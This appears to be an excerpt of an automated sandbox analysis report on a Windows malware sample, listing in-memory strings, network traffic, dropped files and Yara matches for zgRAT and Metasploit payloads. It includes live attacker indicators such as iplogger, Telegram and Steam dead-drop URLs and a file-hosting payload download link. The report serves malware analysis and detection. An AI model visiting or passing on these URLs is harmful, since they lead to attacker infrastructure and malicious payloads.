Source: RegAsm.exe, 00000002.00000002.1950398912.0000000001106000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ipinfo.io:443/widget/demo/8.46.123.33
Source: RegAsm.exe, 00000002.00000002.1953387241.0000000003D0F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://iplogger.org/0
Source: RegAsm.exe, 00000002.00000002.1950398912.0000000001188000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.1953387241.0000000003D0F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://iplogger.org/1nhuM4.js
Source: RegAsm.exe, 00000002.00000002.1954978502.0000000004961000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://iplogger.org:443/1nhuM4.jsoft
Source: gobEmOm5sr.exe, 00000000.00000000.1647082311.0000000000842000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://login.microsoftonline.com/common
Source: gobEmOm5sr.exe, 00000000.00000000.1647082311.0000000000842000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://login.microsoftonline.com/common/
Source: gobEmOm5sr.exe, 00000000.00000000.1647082311.0000000000842000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://sso2urn:ietf:wg:oauth:2.0:oob
Source: 7wpHB_IZvVwIDf0EgO_TfPH6.exe, 0000000B.00000002.2146809633.00000000032B5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199768374681
Source: 7wpHB_IZvVwIDf0EgO_TfPH6.exe, 0000000B.00000002.2146809633.00000000032B5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://t.me/edm0d
Source: 7wpHB_IZvVwIDf0EgO_TfPH6.exe, 0000000B.00000002.2146809633.00000000032B5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://t.me/fneogr
Source: 7wpHB_IZvVwIDf0EgO_TfPH6.exe, 0000000B.00000002.2146809633.00000000032B5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://t.me/fneogrnfeowkhttps://t.me/edm0di11ihttps://steamcommunity.com/profiles/76561199768374681
Source: gobEmOm5sr.exe, 00000000.00000000.1647082311.0000000000842000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.newtonsoft.com/jsonschema
Source: gobEmOm5sr.exe, 00000000.00000000.1647082311.0000000000842000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.nuget.org/packages/Microsoft.Identity.Json.Bson
Source: RegAsm.exe, 00000002.00000002.1953387241.0000000003CE0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://youtransfer.net/
Source: RegAsm.exe, 00000002.00000002.1953387241.0000000003CF9000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.1953387241.0000000003D78000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.1950398912.0000000001112000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.1953387241.0000000003D0F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://youtransfer.net/handler/download?action=download&download_id=uuVCUDm6&private_id=cb726802f5f
Source: RegAsm.exe, 00000002.00000002.1953387241.0000000003CE0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://youtransfer.net/z
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49779 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49780
Source: unknown Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49779
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49777
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown Network traffic detected: HTTP traffic on port 49780 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49777 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown Network traffic detected: HTTP traffic on port 49771 -> 443
Source: unknown HTTPS traffic detected: 173.231.16.77:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown HTTPS traffic detected: 76.76.21.142:443 -> 192.168.2.4:49744 version: TLS 1.2
Source: unknown HTTPS traffic detected: 158.69.225.124:443 -> 192.168.2.4:49745 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.26.2.46:443 -> 192.168.2.4:49752 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49762 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.10.172:443 -> 192.168.2.4:49764 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.10.172:443 -> 192.168.2.4:49766 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.10.172:443 -> 192.168.2.4:49768 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.10.172:443 -> 192.168.2.4:49771 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.4:49777 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.10.172:443 -> 192.168.2.4:49779 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.10.172:443 -> 192.168.2.4:49780 version: TLS 1.2
Drops certificate files (DER)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\Temp\Tmp783F.tmp Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\Temp\Tmp785F.tmp Jump to dropped file

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 25.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects zgRAT Author: ditekSHen
Source: 15.2.1YtOZF0EeqgcR_ddwAXkTcuY.exe.3cc5570.0.unpack, type: UNPACKEDPE Matched rule: Detects zgRAT Author: ditekSHen
Source: 15.2.1YtOZF0EeqgcR_ddwAXkTcuY.exe.3cc5570.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects zgRAT Author: ditekSHen
Source: 0000000A.00000002.2204897517.000000000196E000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth
Source: 00000010.00000002.2284303938.00000000027E4000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth
Source: 0000000A.00000002.2204897517.0000000001A50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth
Source: 00000010.00000002.2284303938.0000000002B20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth
Contains functionality to shutdown / reboot the system
Source: C:\Users\user\Documents\iofolko5\PsIhedmEA44FNRssEU8V9OlH.exe Code function: 7_2_00409448 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx, 7_2_00409448
Creates files inside the system directory
Source: C:\Windows\System32\svchost.exe File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
Detected potential crypto function
Source: C:\Users\user\Desktop\gobEmOm5sr.exe Code function: 0_2_05DF0040 0_2_05DF0040
Source: C:\Users\user\Desktop\gobEmOm5sr.exe Code function: 0_2_05DFA08C 0_2_05DFA08C
Source: C:\Users\user\Desktop\gobEmOm5sr.exe Code function: 0_2_05DF0007 0_2_05DF0007
Source: C:\Users\user\Desktop\gobEmOm5sr.exe Code function: 0_2_05DF6E80 0_2_05DF6E80
Source: C:\Users\user\Desktop\gobEmOm5sr.exe Code function: 0_2_05DF6E73 0_2_05DF6E73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_004CF160 2_2_004CF160
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_00481170 2_2_00481170
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0042C1F0 2_2_0042C1F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0046D250 2_2_0046D250
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_00436230 2_2_00436230
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_004302C0 2_2_004302C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_00431360 2_2_00431360
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_00451300 2_2_00451300
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_004213A0 2_2_004213A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_004424E0 2_2_004424E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_00508650 2_2_00508650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_00437680 2_2_00437680
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_00434690 2_2_00434690
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_00433760 2_2_00433760
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0047E8A0 2_2_0047E8A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_004348B0 2_2_004348B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_00440A90 2_2_00440A90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_00426D90 2_2_00426D90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0054D02A 2_2_0054D02A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_004210E0 2_2_004210E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_00543169 2_2_00543169
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_00402100 2_2_00402100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0042D100 2_2_0042D100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0042A1E0 2_2_0042A1E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_00516190 2_2_00516190
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_005121A0 2_2_005121A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_004432C0 2_2_004432C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_005612E0 2_2_005612E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_004242B0 2_2_004242B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_00423470 2_2_00423470
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0040B5E0 2_2_0040B5E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_00405640 2_2_00405640
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_00422640 2_2_00422640
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_00402630 2_2_00402630
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0044A710 2_2_0044A710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_005427C0 2_2_005427C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0054F7F8 2_2_0054F7F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_005667ED 2_2_005667ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_00421820 2_2_00421820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_00425820 2_2_00425820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_00551830 2_2_00551830
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0042C8E0 2_2_0042C8E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0042D8B0 2_2_0042D8B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0041E9E0 2_2_0041E9E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_00561EFC 2_2_00561EFC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_00401E90 2_2_00401E90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_00440FF0 2_2_00440FF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_00515F95 2_2_00515F95
Source: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe Code function: 6_2_02BFA3D8 6_2_02BFA3D8
Source: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe Code function: 6_2_02BFA3CA 6_2_02BFA3CA
Source: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe Code function: 6_2_02BFA180 6_2_02BFA180
Source: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe Code function: 6_2_02BFA174 6_2_02BFA174
Source: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe Code function: 6_2_053594C0 6_2_053594C0
Source: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe Code function: 6_2_0535E710 6_2_0535E710
Source: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe Code function: 6_2_053556D0 6_2_053556D0
Source: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe Code function: 6_2_053581C0 6_2_053581C0
Source: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe Code function: 6_2_053515A8 6_2_053515A8
Source: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe Code function: 6_2_053594B0 6_2_053594B0
Source: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe Code function: 6_2_0535E700 6_2_0535E700
Source: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe Code function: 6_2_0535A630 6_2_0535A630
Source: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe Code function: 6_2_0535A640 6_2_0535A640
Source: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe Code function: 6_2_053556CA 6_2_053556CA
Source: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe Code function: 6_2_053581B0 6_2_053581B0
Source: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe Code function: 6_2_0535B9B0 6_2_0535B9B0
Source: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe Code function: 6_2_0535B9A2 6_2_0535B9A2
Source: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe Code function: 6_2_053689C8 6_2_053689C8
Source: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe Code function: 6_2_05686B88 6_2_05686B88
Source: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe Code function: 6_2_056809C8 6_2_056809C8
Source: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe Code function: 6_2_056809B7 6_2_056809B7
Source: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe Code function: 6_2_05683BD4 6_2_05683BD4
Source: C:\Users\user\Documents\iofolko5\PsIhedmEA44FNRssEU8V9OlH.exe Code function: 7_2_0040840C 7_2_0040840C
Source: C:\Users\user\Documents\iofolko5\yh8OwfLgsaGOEy8sLU5UpJIK.exe Code function: 8_2_01372DD0 8_2_01372DD0
Source: C:\Users\user\Documents\iofolko5\yh8OwfLgsaGOEy8sLU5UpJIK.exe Code function: 8_2_01372C60 8_2_01372C60
Source: C:\Users\user\Documents\iofolko5\8LEi0YA5qqlYpHd7zimCU8lz.exe Code function: 9_2_017D6398 9_2_017D6398
Source: C:\Users\user\Documents\iofolko5\8LEi0YA5qqlYpHd7zimCU8lz.exe Code function: 9_2_017D638B 9_2_017D638B
Source: C:\Users\user\Documents\iofolko5\8LEi0YA5qqlYpHd7zimCU8lz.exe Code function: 9_2_017D65FA 9_2_017D65FA
Source: C:\Users\user\Documents\iofolko5\8LEi0YA5qqlYpHd7zimCU8lz.exe Code function: 9_2_017D6608 9_2_017D6608
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Code function: 17_2_61EAD2AC 17_2_61EAD2AC
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Code function: 17_2_61E4B8A1 17_2_61E4B8A1
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Code function: 17_2_61E75F1F 17_2_61E75F1F
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Code function: 17_2_61E40065 17_2_61E40065
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Code function: 17_2_61E9E24F 17_2_61E9E24F
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Code function: 17_2_61E62554 17_2_61E62554
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Code function: 17_2_61E9A4A7 17_2_61E9A4A7
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Code function: 17_2_61E4E4BF 17_2_61E4E4BF
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Code function: 17_2_61E94783 17_2_61E94783
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Code function: 17_2_61E7A790 17_2_61E7A790
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Code function: 17_2_61E18736 17_2_61E18736
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Code function: 17_2_61E86668 17_2_61E86668
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Code function: 17_2_61E58670 17_2_61E58670
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Code function: 17_2_61E6667F 17_2_61E6667F
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Code function: 17_2_61EA0BA9 17_2_61EA0BA9
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Code function: 17_2_61E62CA3 17_2_61E62CA3
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Code function: 17_2_61E98FE2 17_2_61E98FE2
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Code function: 17_2_61E88FCA 17_2_61E88FCA
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Code function: 17_2_61E52F80 17_2_61E52F80
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Code function: 17_2_61EA2F47 17_2_61EA2F47
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Code function: 17_2_61E56F18 17_2_61E56F18
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Code function: 17_2_61E4CEF9 17_2_61E4CEF9
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Code function: 17_2_61E1EEFF 17_2_61E1EEFF
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Code function: 17_2_61EA91F6 17_2_61EA91F6
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Code function: 17_2_61E651DD 17_2_61E651DD
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Code function: 17_2_61E9316A 17_2_61E9316A
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Code function: 17_2_61E9F0ED 17_2_61E9F0ED
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Code function: 17_2_61EA70CF 17_2_61EA70CF
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Code function: 17_2_61E9D0C3 17_2_61E9D0C3
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Code function: 17_2_61E8D0B6 17_2_61E8D0B6
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Code function: 17_2_61E6904E 17_2_61E6904E
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Code function: 17_2_61E4304E 17_2_61E4304E
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Code function: 17_2_61E15337 17_2_61E15337
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Code function: 17_2_61E672DC 17_2_61E672DC
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Code function: 17_2_61E19208 17_2_61E19208
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Code function: 17_2_61E534E3 17_2_61E534E3
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Code function: 17_2_61E77452 17_2_61E77452
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Code function: 17_2_61E37930 17_2_61E37930
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Code function: 17_2_61E21816 17_2_61E21816
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Code function: 17_2_61E9FBF0 17_2_61E9FBF0
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Code function: 17_2_61E55BD7 17_2_61E55BD7
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Code function: 17_2_61EA5B62 17_2_61EA5B62
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Code function: 17_2_61E91DC1 17_2_61E91DC1
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Code function: 17_2_61E6DDA5 17_2_61E6DDA5
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Code function: 17_2_61E31DAB 17_2_61E31DAB
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Code function: 17_2_61E95D7A 17_2_61E95D7A
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Code function: 17_2_61E5BC4C 17_2_61E5BC4C
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Code function: 17_2_61E25FA2 17_2_61E25FA2
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Code function: 17_2_61E1DEC2 17_2_61E1DEC2
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Code function: 17_2_61E69E8F 17_2_61E69E8F
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Code function: 17_2_61E89E0E 17_2_61E89E0E
Enables security privileges
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process token adjusted: Security
Found potential string decryption / allocating functions
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 0053E310 appears 39 times
One or more processes crash
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 8032 -ip 8032
Sample file is different than original file name gathered from version info
Source: gobEmOm5sr.exe, 00000000.00000000.1648178201.0000000000EDE000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenamegithubsoft.exe$ vs gobEmOm5sr.exe
Source: gobEmOm5sr.exe, 00000000.00000002.1663531403.0000000005A90000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenamewMwlL.dll0 vs gobEmOm5sr.exe
Source: gobEmOm5sr.exe, 00000000.00000002.1654904203.0000000004EF5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamePDFReader.exe4 vs gobEmOm5sr.exe
Source: gobEmOm5sr.exe, 00000000.00000002.1653570036.00000000013BE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs gobEmOm5sr.exe
Source: gobEmOm5sr.exe, 00000000.00000002.1663150655.0000000005790000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenamePE.dll& vs gobEmOm5sr.exe
Source: gobEmOm5sr.exe, 00000000.00000002.1654904203.00000000050CF000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamePDFReader.exe4 vs gobEmOm5sr.exe
Uses 32bit PE files
Source: gobEmOm5sr.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Yara signature match
Source: 25.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 15.2.1YtOZF0EeqgcR_ddwAXkTcuY.exe.3cc5570.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 15.2.1YtOZF0EeqgcR_ddwAXkTcuY.exe.3cc5570.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 0000000A.00000002.2204897517.000000000196E000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
Source: 00000010.00000002.2284303938.00000000027E4000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
Source: 0000000A.00000002.2204897517.0000000001A50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
Source: 00000010.00000002.2284303938.0000000002B20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
